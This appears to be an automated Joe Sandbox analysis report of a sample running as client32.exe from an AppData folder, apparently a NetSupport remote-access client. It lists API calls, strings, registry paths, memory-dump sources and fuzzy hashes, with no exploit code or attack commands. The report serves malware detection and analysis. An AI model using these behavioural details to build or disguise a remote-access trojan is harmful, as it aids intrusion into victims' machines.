                                                                                                                                                    • Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                                                                                    • Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe, xrefs: 11144804, 11144812
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentFileModuleNameProcess
                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
                                                                                                                                                    • API String ID: 2251294070-2059335969
                                                                                                                                                    • Opcode ID: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                                                                                                    • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                                                                                                    • Opcode Fuzzy Hash: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
                                                                                                                                                    • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 11110239
                                                                                                                                                      • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                                                                      • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                                                                      • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                                    • _memset.LIBCMT ref: 11110262
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp
                                                                                                                                                    • API String ID: 2803934178-2363596943
                                                                                                                                                    • Opcode ID: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                                                                                                    • Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
                                                                                                                                                    • Opcode Fuzzy Hash: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                                                                                                    • Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateFileHandle
                                                                                                                                                    • String ID: \\.\NSWFPDrv
                                                                                                                                                    • API String ID: 3498533004-85019792
                                                                                                                                                    • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                                                                    • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                                                                                                    • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                                                                    • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _calloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1679841372-0
APIs
• _memset.LIBCMT ref: 6CA88FE4
• getsockname.WSOCK32(?,?,00000010,?,03822CB0,?), ref: 6CA89005
• WSAGetLastError.WSOCK32(?,?,00000010,?,03822CB0,?), ref: 6CA8902E
  • Part of subcall function 6CA85840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6CA88F91,00000000,00000000,6CACB8DA,?,00000080), ref: 6CA85852
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
Similarity
• API ID: ErrorLast_memsetgetsocknameinet_ntoa
• String ID:
• API String ID: 3066294524-0
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
• __wsplitpath.LIBCMT ref: 11112185
  • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
• GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
• String ID:
• API String ID: 1847508633-0
APIs
• GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
• OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
  • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00E73DD0,00E73DD0,00E73DD0,00E73DD0,00E73DD0,00E73DD0,00E73DD0,111EFB64,?,00000001,00000001), ref: 1109EDB0
  • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,00E73DD0,?,00000001,00000001), ref: 1109EDC3
• CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
• String ID:
• API String ID: 2256153495-0
APIs
• InitializeCriticalSection.KERNEL32(111F1908,1EF76653,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
• EnterCriticalSection.KERNEL32(111F1908,1EF76653,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
• LeaveCriticalSection.KERNEL32(111F1908,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Similarity
• API ID: CriticalSection$EnterInitializeLeave
• String ID:
• API String ID: 3991485460-0
APIs
• LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID: ??CTL32.DLL
                                                                                                                                                    • API String ID: 1029625771-2984404022
                                                                                                                                                    • Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                                                                                    • Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
                                                                                                                                                    • Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                                                                                    • Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91
                                                                                                                                                    APIs
                                                                                                                                                    • inet_ntoa.WSOCK32(00000080,?,00000000,?,6CA88F91,00000000,00000000,6CACB8DA,?,00000080), ref: 6CA85852
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: inet_ntoa
                                                                                                                                                    • String ID: gfff
                                                                                                                                                    • API String ID: 1879540557-1553575800
                                                                                                                                                    • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                                                                    • Instruction ID: 3e49a66ef38e64521bd68afd9a511928bd6d3c3796347e6f8a24a0eafb7d9be8
                                                                                                                                                    • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                                                                    • Instruction Fuzzy Hash: 3C11AB226092D78BD3028A2EA8642D6BFD9DF86240F1C456ADCCACB701C211D84AC7D0
                                                                                                                                                    APIs
                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DriveType
                                                                                                                                                    • String ID: ?:\
                                                                                                                                                    • API String ID: 338552980-2533537817
                                                                                                                                                    • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                                                                                    • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
                                                                                                                                                    • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                                                                                    • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                                                                                      • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                                                                    Strings
                                                                                                                                                    • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenwvsprintf
                                                                                                                                                    • String ID: Error %d Opening regkey %s
                                                                                                                                                    • API String ID: 1772833024-3994271378
                                                                                                                                                    • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                                                                    • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                                                                                                    • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                                                                    • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                                                                                                    APIs
                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                                                                                      • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                                                                    Strings
                                                                                                                                                    • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Closewvsprintf
                                                                                                                                                    • String ID: Error %d closing regkey %x
                                                                                                                                                    • API String ID: 843752472-892920262
                                                                                                                                                    • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                                                                                    • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                                                                                                    • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                                                                                    • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,11026BE0,02E6B850,?,?,?,00000100,?,?,00000009), ref: 11146FF9
                                                                                                                                                      • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
